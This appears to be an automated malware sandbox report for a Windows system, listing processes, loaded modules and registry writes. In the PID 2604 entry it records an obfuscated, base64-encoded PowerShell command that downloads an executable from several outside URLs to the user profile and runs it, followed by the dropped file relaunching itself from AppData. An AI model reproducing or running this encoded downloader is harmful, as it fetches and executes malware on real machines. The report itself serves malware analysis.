c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\version.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\sxs.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winspool.drv
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\msxml6.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\windowscodecs.dll

PID
3888
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --no-sandbox --service-request-channel-token=13326432766255343067 --mojo-platform-channel-handle=1960 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\twext.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\zipfldr.dll
c:\program files\winrar\rarext.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\syncui.dll
c:\windows\system32\synceng.dll
c:\program files\notepad++\nppshell_06.dll
c:\windows\system32\acppage.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\msi.dll
c:\windows\system32\wer.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\netutils.dll

PID
2684
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=1800911614677241721 --mojo-platform-channel-handle=2976 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2604
CMD
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\178.exe
c:\windows\system32\netutils.dll

PID
3112
CMD
"C:\Users\admin\178.exe"
Path
C:\Users\admin\178.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Monkey Head Software
Description
Monkey Head Media Stream
Version
1, 0, 0, 1
Modules
Image
c:\users\admin\178.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\apphelp.dll

PID
4076
CMD
--3a2e7ef0
Path
C:\Users\admin\178.exe
Indicators
Parent process
178.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Monkey Head Software
Description
Monkey Head Media Stream
Version
1, 0, 0, 1
Modules
Image
c:\users\admin\178.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
3048
CMD
"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
Path
C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
Indicators
No indicators
Parent process
178.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Monkey Head Software
Description
Monkey Head Media Stream
Version
1, 0, 0, 1
Modules
Image
c:\users\admin\appdata\local\msptermsizes\msptermsizes.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\apphelp.dll

PID
3216
CMD
--f91b2738
Path
C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
Indicators
Parent process
msptermsizes.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Monkey Head Software
Description
Monkey Head Media Stream
Version
1, 0, 0, 1
Modules
Image
c:\users\admin\appdata\local\msptermsizes\msptermsizes.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll

Registry activity

Total events
3888
Read events
3272
Write events
610
Delete events
6

Modification events

PID
Process
Operation
Key
Name
Value
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
StatusCodes
01000000
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
2980
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
2980
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13215109911333750
2980
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2980
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
aapocclcgogkmnckokdopfmhonfmgoek
A79C976286D57B0D83E5507FB4EA36A0F35420628F49A626ACA94E17FBD6ED2C
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
15B1C3FE35F29528448F36A72A4DFBC58A8083C7190559D25865779166D220A2
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
aohghmighlieiainnegkcijnfilokake
A9EC0A908F93C3C31EB70BFD45B1F6D88BFFC2959FE2CA24103F5CAD15943806
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
apdfllckaahabafndbhieahigkjlhalf
4C156C4C22A38B2B19ADD10722D0715382E95550BB58102C6812B8AB77AC8630
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
blpcfgokakmgnkcojhhkbfbldkacnbeo
E7E04637D467AEE22C2BA372B7FDAC83F237D75903FFD05199BDD425AE685907
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
felcaaldnbdncclmgdcncolpebgiejap
B58AE4F4C76A258273876C3F90B5CCB0DDD8671F8ECC4501C08AF758838FAF95
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
gfdkimpbcpahaombhbimeihdjnejgicl
D6B079666F209503A09486C70AC09307652A0F7F783166A999B27C99D0DA79E2
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
ghbmnnjooekpmoecnnnilnnbdlolhkhi
